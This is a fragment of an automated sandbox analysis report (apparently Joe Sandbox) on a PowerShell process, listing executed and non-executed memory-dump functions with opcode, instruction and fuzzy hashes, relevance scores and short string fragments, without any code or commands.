                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d280934e9f46f928671274360f52b489e9416aff9cfb7525f77a4b795d19ce2b
                                                                    • Instruction ID: d5573f36f031b0b2ff447c1cd5d3a2049959cdfa97ef436bb5ec10a5a6e702aa
                                                                    • Opcode Fuzzy Hash: d280934e9f46f928671274360f52b489e9416aff9cfb7525f77a4b795d19ce2b
                                                                    • Instruction Fuzzy Hash: A251807590D3D54FD703CB28D8A159ABFB4EE4721071A44CBC4C6DF263D629AC4ACBA2
                                                                    Function 04AB77F9 Relevance: .1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e12d937127a2c4288a042e3fafb8f8b2e94aa4f32ca911ec1d54a8a1f64bca1e
                                                                    • Instruction ID: 1d650c3cf98cbf56b27ba7d1935c974296a33ae48b5badd7848c5c3f018c230e
                                                                    • Opcode Fuzzy Hash: e12d937127a2c4288a042e3fafb8f8b2e94aa4f32ca911ec1d54a8a1f64bca1e
                                                                    • Instruction Fuzzy Hash: D441BD38B042048FDB19DB70C948AAD7BB6EFC9354F084468E546EB7A1CB75AC01CB90
                                                                    Function 07608648 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7b3c4581b2dfada8e214338fc02f9b4f92a022ce7bc2998bb31a76123a3fbf6
                                                                    • Instruction ID: 66022e886bab85e039771a011408b3b9a0e826201675113b121f5283c047b2fa
                                                                    • Opcode Fuzzy Hash: c7b3c4581b2dfada8e214338fc02f9b4f92a022ce7bc2998bb31a76123a3fbf6
                                                                    • Instruction Fuzzy Hash: A94138B9714302DFDB15CA7488147ABBBA1AFC6214F15807AC506DB3D2DB35C942C7E1
                                                                    Function 04ABD680 Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12299d326adde0756b2f1c17f6bd3cb4363e21ac48f1d930b7f7a51def6b1950
                                                                    • Instruction ID: 91dfdabb638a432bd3051fe627a0ea160c0ef5392a664639b31477323ca09f56
                                                                    • Opcode Fuzzy Hash: 12299d326adde0756b2f1c17f6bd3cb4363e21ac48f1d930b7f7a51def6b1950
                                                                    • Instruction Fuzzy Hash: 00410134A002089FEB14DB79C4547AEBAE7FFC8211F18C46DD806AB755DB75AC429BA0
                                                                    Function 0760206E Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9ad569727861ba21f47fba1baf4295647946fb9e0631b1cac033ba86db6de9f
                                                                    • Instruction ID: 00e5f1cb1ca74db3588cb859592ee119f0abcadbe898d74f2ab006e686b3ef7a
                                                                    • Opcode Fuzzy Hash: e9ad569727861ba21f47fba1baf4295647946fb9e0631b1cac033ba86db6de9f
                                                                    • Instruction Fuzzy Hash: B63106F0A00202DFDB298EB48D68B7B77A2BF84244F1485A9DA069F3D1D731D841C7E2
                                                                    Function 04AB7810 Relevance: .1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d4e03b3fe0953d20fc0b2c937f02ba9116310125b9f36139a8df25ed8751add
                                                                    • Instruction ID: f45a57639adae94cc0ccd0c2d8149e3632fc02fa89aa0c940a38e24dce97e5d5
                                                                    • Opcode Fuzzy Hash: 0d4e03b3fe0953d20fc0b2c937f02ba9116310125b9f36139a8df25ed8751add
                                                                    • Instruction Fuzzy Hash: F5416C39B002049FDB28DB64C958AAD7BB6EFC8754F044428E546EB7A0CB75AD41CB90
                                                                    Function 04AB2BB1 Relevance: .1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9eec53c4fd8607dd8f36ec03ef6a72655d8cf2246ff0f5246820450d61b93126
                                                                    • Instruction ID: 92bede2b7a3746701ddcccc35933524e6bbf8b34b8cbc3721ebf2c7779df6851
                                                                    • Opcode Fuzzy Hash: 9eec53c4fd8607dd8f36ec03ef6a72655d8cf2246ff0f5246820450d61b93126
                                                                    • Instruction Fuzzy Hash: F7417975A002098FCB15CF49C498EEAF7B5FF48314B1186AAD855AB365C736FC91CBA0
                                                                    Function 07608000 Relevance: .1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf07ff058abac94428ad7da8048b5e4a3f7d69284368b054be2e71a9bd5e6b6f
                                                                    • Instruction ID: aa58253abe69b5e055ca94cb998a8c8d5c7d07a64de73ac8f233c49c26615dbd
                                                                    • Opcode Fuzzy Hash: cf07ff058abac94428ad7da8048b5e4a3f7d69284368b054be2e71a9bd5e6b6f
                                                                    • Instruction Fuzzy Hash: 8D318F74B00204AFE3189BA4C851BEF7AA3AFC5704F54C029E9066F7D1CF76AC029B91
                                                                    Function 07608628 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c545a4dd19ca56bda99084d27f2f5cc88f43993f53ac69ae8fec65a350f527a
                                                                    • Instruction ID: 32e971fa2de3590600879fa710b6b23e6796972c96001cc44acc6a09073a15d5
                                                                    • Opcode Fuzzy Hash: 0c545a4dd19ca56bda99084d27f2f5cc88f43993f53ac69ae8fec65a350f527a
                                                                    • Instruction Fuzzy Hash: 902157B9618302DFEB15CF7498143BB7FA19F86204F5940A6C4069B3E2DB35D981CBE2
                                                                    Function 045CF520 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762142659.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_45cd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1772aaebe97626c048c1bde2c27a4a48f808bd148aa4459b1186bcb7bfb03778
                                                                    • Instruction ID: 43514076f3dc0a0269425e58ce6b2f8e49fb1f97777d4adee2bc4a8b06f79c44
                                                                    • Opcode Fuzzy Hash: 1772aaebe97626c048c1bde2c27a4a48f808bd148aa4459b1186bcb7bfb03778
                                                                    • Instruction Fuzzy Hash: 8D212776604200DFDF05DF54E9C0B16BF62FB88314F20C5ADEA094E296C336E456DB61
                                                                    Function 04ABA950 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cf0c96614004069522cfcc03b27ea5d2a1f8557cd8756c5d6b15b1496a1d69f
                                                                    • Instruction ID: 80c7cc8d53b438ed36c9d7d321d37118e43c2cbb139b7dbde062609db10b759a
                                                                    • Opcode Fuzzy Hash: 8cf0c96614004069522cfcc03b27ea5d2a1f8557cd8756c5d6b15b1496a1d69f
                                                                    • Instruction Fuzzy Hash: F82181B4A052498FCB01CF98D89099EBFB0FF4A310B15819AD855EB352D334EC41CBA1
                                                                    Function 045CF51B Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762142659.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_45cd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                                    • Instruction ID: d9fc4e06cc36109110f57cbedc5cf2556e29d11c81512d4eee9a9c6e7f437346
                                                                    • Opcode Fuzzy Hash: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                                    • Instruction Fuzzy Hash: 53218C7A504240DFCF06CF54DAC4B16BF62FB48314F24C6ADD9094A6A6C33AD46ADB91
                                                                    Function 045CD01D Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762142659.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_45cd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc94ff30195ce9d33433a92b06020547087ed4d539a56d0899bf410d495ad1e8
                                                                    • Instruction ID: 577296c013c490c6496fd75cb6160ad3e411a52184a89837a1495ba722d1e8a1
                                                                    • Opcode Fuzzy Hash: cc94ff30195ce9d33433a92b06020547087ed4d539a56d0899bf410d495ad1e8
                                                                    • Instruction Fuzzy Hash: 4E01F7315043409EE7204E69ECC4B67BFA8EF41325F08C42EDC489B182E679A84ADAB1
                                                                    Function 045CD005 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762142659.00000000045CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045CD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_45cd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1978a0ec540a3a0d26ffad02a51ca9db8a9d38c45cbda3180965f1ba68d1421
                                                                    • Instruction ID: 49d83af455b21b61300299b29196f286c636d7291a13e66e9de5cce7f94e1f1c
                                                                    • Opcode Fuzzy Hash: d1978a0ec540a3a0d26ffad02a51ca9db8a9d38c45cbda3180965f1ba68d1421
                                                                    • Instruction Fuzzy Hash: D3012D6100E3C05FD7128B259894B56BFB4AF43224F1981DFD8889F193C2696848C772
                                                                    Function 04ABF510 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d95111f1ac400096b49b768eb0043cbb0964400ce704c4132cfad171422c10
                                                                    • Instruction ID: fac3998b755f10864607a8918da5e67a45a421bcb6ad4a0b44d250277a6ba9a8
                                                                    • Opcode Fuzzy Hash: 67d95111f1ac400096b49b768eb0043cbb0964400ce704c4132cfad171422c10
                                                                    • Instruction Fuzzy Hash: 6201AD357052004F87266B28A4684ED3BE3FFC9622316418EEC42C7362CE348C0B9B92
                                                                    Function 04ABF520 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5b48ae5044aec3ec5b67d81d10d64c4f9674e81c5cdec508f2aaa21349f41179
                                                                    • Instruction ID: 8b31583d1ce8c02ef7b22d0f6ca6202a4a36fee6087dfd6d41aa6dc15f52c36c
                                                                    • Opcode Fuzzy Hash: 5b48ae5044aec3ec5b67d81d10d64c4f9674e81c5cdec508f2aaa21349f41179
                                                                    • Instruction Fuzzy Hash: 0EF06D353012108F87256B6CA0184AE7BE7FFCD622316415EEC06C7362CF749C079792
                                                                    Function 04ABFDCC Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b2588bc8bb78faa50804012fe7ad5877830c010265660b7d2c530334c9e5f0d
                                                                    • Instruction ID: 6c8840965a590524ac17bdba15384bbd3b4306333326a2061a724cacd2517a62
                                                                    • Opcode Fuzzy Hash: 8b2588bc8bb78faa50804012fe7ad5877830c010265660b7d2c530334c9e5f0d
                                                                    • Instruction Fuzzy Hash: CCE04F74D042499F8740DFB999425ADFFF4AB09200B24C8AED959E7302E63196528BD1
                                                                    Function 04ABFDD8 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction ID: 1d3feff5f4ed148f95ef57ff9a5196c201a8eb5fd9cabc14319a3cf032d5ca70
                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction Fuzzy Hash: 49D06270D042099F8780DFADC94156DFBF4EB59200F5485AE9919D7301F73156128BD1

                                                                    Non-executed Functions

                                                                    Function 0760CCD8 Relevance: 14.1, Strings: 11, Instructions: 375COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q$$q
                                                                    • API String ID: 0-2113266693
                                                                    • Opcode ID: d0f512e110dbc1f3e8a4399c1ec56a1e7f35819a5f50a3a4e0f71fbc1497669b
                                                                    • Instruction ID: 159c6ac460bab13af19c6d5469ef7cfb2af5722e87c9c759f306a6a1fc58d03b
                                                                    • Opcode Fuzzy Hash: d0f512e110dbc1f3e8a4399c1ec56a1e7f35819a5f50a3a4e0f71fbc1497669b
                                                                    • Instruction Fuzzy Hash: 4BD1D6B170420ADFDB298E75D4146EB7BA1EF85211F18C666E8078B3D1DB31D842CBE1
                                                                    Function 0760D8DD Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
                                                                    • API String ID: 0-328666906
                                                                    • Opcode ID: ba4d56e5ea9d3aa6162645eac9d01e8a1b2364384f76bab31eb0f6877d438407
                                                                    • Instruction ID: 895888b7632a005b69de8fdfb049c0e9ec30da0b1740c0d3ec92f510a459806c
                                                                    • Opcode Fuzzy Hash: ba4d56e5ea9d3aa6162645eac9d01e8a1b2364384f76bab31eb0f6877d438407
                                                                    • Instruction Fuzzy Hash: 3971C2B1B042069FDB288BE4D85177BBBA2EF88214F188659E9479B3D1DB31DC42C7D1
                                                                    Function 076016D0 Relevance: 9.2, Strings: 7, Instructions: 491COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                                    • API String ID: 0-2432477355
                                                                    • Opcode ID: 640e60fc2ae73afe4bdc02c45d9fa01d7244130e82d7d048eb41b8f9fea7ea8a
                                                                    • Instruction ID: 4bf65577acfeba7e6d3ed95a17fb1b1f2687d2e75dd9bfb2c275fb8c288a90a1
                                                                    • Opcode Fuzzy Hash: 640e60fc2ae73afe4bdc02c45d9fa01d7244130e82d7d048eb41b8f9fea7ea8a
                                                                    • Instruction Fuzzy Hash: C2F108B1B042099FD72D9AB994147AFBBA2EFC6311F14806AD846CB391DB31DD42C7E1
                                                                    Function 07600918 Relevance: 9.1, Strings: 7, Instructions: 330COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                                    • API String ID: 0-2432477355
                                                                    • Opcode ID: 8d000672a1789b3b4eb734ff1771820e2285aeb766fa5ed0a668f5dbefc1188e
                                                                    • Instruction ID: c6a547db65f81e1ee1736942a632b5fc3462ccf431f0157167d52e30d328234a
                                                                    • Opcode Fuzzy Hash: 8d000672a1789b3b4eb734ff1771820e2285aeb766fa5ed0a668f5dbefc1188e
                                                                    • Instruction Fuzzy Hash: A0A13BB27043568FD7298A799811777BBA1EFC6215B18806BD946CB3D2DB31CC42C7E1
                                                                    Function 0760E130 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                                                                    • API String ID: 0-3442133670
                                                                    • Opcode ID: 562da99e77a7521f83f7809b2617e52ee2ea5fd828fcb7f10ed8a00271eecf67
                                                                    • Instruction ID: c132d50280e8975eee45aaa1ea4e91c9f7d6cb18ad486c88095a71c1ac919426
                                                                    • Opcode Fuzzy Hash: 562da99e77a7521f83f7809b2617e52ee2ea5fd828fcb7f10ed8a00271eecf67
                                                                    • Instruction Fuzzy Hash: 126192B0B00225DFDB2CEE64C545B6BBBA2AF45711F188899E8166B3D1C732DC45CBD2
                                                                    Function 0760DDCC Relevance: 8.9, Strings: 7, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                    • API String ID: 0-2980145124
                                                                    • Opcode ID: ef9961148676b0e6c456a5184afb2f9f7e47a3eb1c3f01a72e8f8ba0c192e6da
                                                                    • Instruction ID: a6869cce395345598d9e2d77397b14e33f310206180c920cdd7d8b46e8b14786
                                                                    • Opcode Fuzzy Hash: ef9961148676b0e6c456a5184afb2f9f7e47a3eb1c3f01a72e8f8ba0c192e6da
                                                                    • Instruction Fuzzy Hash: A451BEB070021ADFDB2C9EA5D5047AB77A2BF81311F188566E8079B2D0C772DD96CBE1
                                                                    Function 0760FB89 Relevance: 8.8, Strings: 7, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tPq$tPq$$q$$q$$q$$q$$q
                                                                    • API String ID: 0-3835674049
                                                                    • Opcode ID: 0356637af78762e12a4a9d57ae8e55fe365bb07aa046e14686db36afcb1d5f8c
                                                                    • Instruction ID: 42bf148be8fc0539de30b1145e0fc210e691d624eb97ccc014626e4dbe14cac3
                                                                    • Opcode Fuzzy Hash: 0356637af78762e12a4a9d57ae8e55fe365bb07aa046e14686db36afcb1d5f8c
                                                                    • Instruction Fuzzy Hash: 3A21F5B6B0021A8FD73C8AB5A5516B777E1BF84211B29446AED02DB3D1CB31DC01CBD1
                                                                    Function 0760E7E8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$tPq$$q$$q$$q
                                                                    • API String ID: 0-838716513
                                                                    • Opcode ID: e82b87c7ab6c2ca4e7b3e3af005dee82e53795937a8808454e229ae704704b34
                                                                    • Instruction ID: 296dfc3efe9b234d1b46489fafeb70a81b70016798136528a66240551334b955
                                                                    • Opcode Fuzzy Hash: e82b87c7ab6c2ca4e7b3e3af005dee82e53795937a8808454e229ae704704b34
                                                                    • Instruction Fuzzy Hash: C96171B0A00226DFDB2CAE24D54576B77A1BF45351F18886AE8075B3D0D772EC91CBD1
                                                                    Function 07600538 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$$q$$q$$q
                                                                    • API String ID: 0-170447905
                                                                    • Opcode ID: 61de42418d074365ac073ccba654ea57312ffee4e262ea362d746ef85e9374ea
                                                                    • Instruction ID: 1fceffc2b0578ffc77bb790ee581ec98fd88eedc73369c080a4425be33592a10
                                                                    • Opcode Fuzzy Hash: 61de42418d074365ac073ccba654ea57312ffee4e262ea362d746ef85e9374ea
                                                                    • Instruction Fuzzy Hash: A54129B5B243069FDB295A7498107BB7BB2AFC5210F14806AD9469B3D2DB31C942C7E2
                                                                    Function 0760D9DE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                    • API String ID: 0-706544200
                                                                    • Opcode ID: 5c40c35189d1707d46f505c440ea29f4f8e9b94b1c219a3b1259dbdd8b4b11c8
                                                                    • Instruction ID: d17288172bcece0f0fa411f0033bad28a64ce8814a77d75f2531fee6f94331a9
                                                                    • Opcode Fuzzy Hash: 5c40c35189d1707d46f505c440ea29f4f8e9b94b1c219a3b1259dbdd8b4b11c8
                                                                    • Instruction Fuzzy Hash: 083161B0B04215DFDB28DF94D455A6AFBE2FF88610F188295E9066B391C731DC52CBD1
                                                                    Function 0760D1A8 Relevance: 5.5, Strings: 4, Instructions: 486COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (oq$(oq$(oq$(oq
                                                                    • API String ID: 0-3853041632
                                                                    • Opcode ID: d329e7eeb1d8933f211c9421942041fb574ef97a69f241db7b2999aa939fbccf
                                                                    • Instruction ID: 94c11337fa9e743f765696fb0e922f24c9d34865c8bac27e3aff105fdf643bc9
                                                                    • Opcode Fuzzy Hash: d329e7eeb1d8933f211c9421942041fb574ef97a69f241db7b2999aa939fbccf
                                                                    • Instruction Fuzzy Hash: CDF116B1704306DFDB299FB4D8447ABBBA2EF86210F14856AE906CB3D1CB31D845C7A1
                                                                    Function 0760CB58 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$tPq$tPq
                                                                    • API String ID: 0-1392854178
                                                                    • Opcode ID: 78cdb8af437b2edbb6dbb06be42d0edae5dc94de66dc3abcb32a34c16abb3cd6
                                                                    • Instruction ID: f599eec090c12bd7d7a983c2951681aa872effbc3db1e20d7274d6d3411a3d21
                                                                    • Opcode Fuzzy Hash: 78cdb8af437b2edbb6dbb06be42d0edae5dc94de66dc3abcb32a34c16abb3cd6
                                                                    • Instruction Fuzzy Hash: BF41E5B1F002058FD7288B65D4457ABFBA2EFC5611F28C5AAD9169B381DB31D806CBF1
                                                                    Function 0760EB9F Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
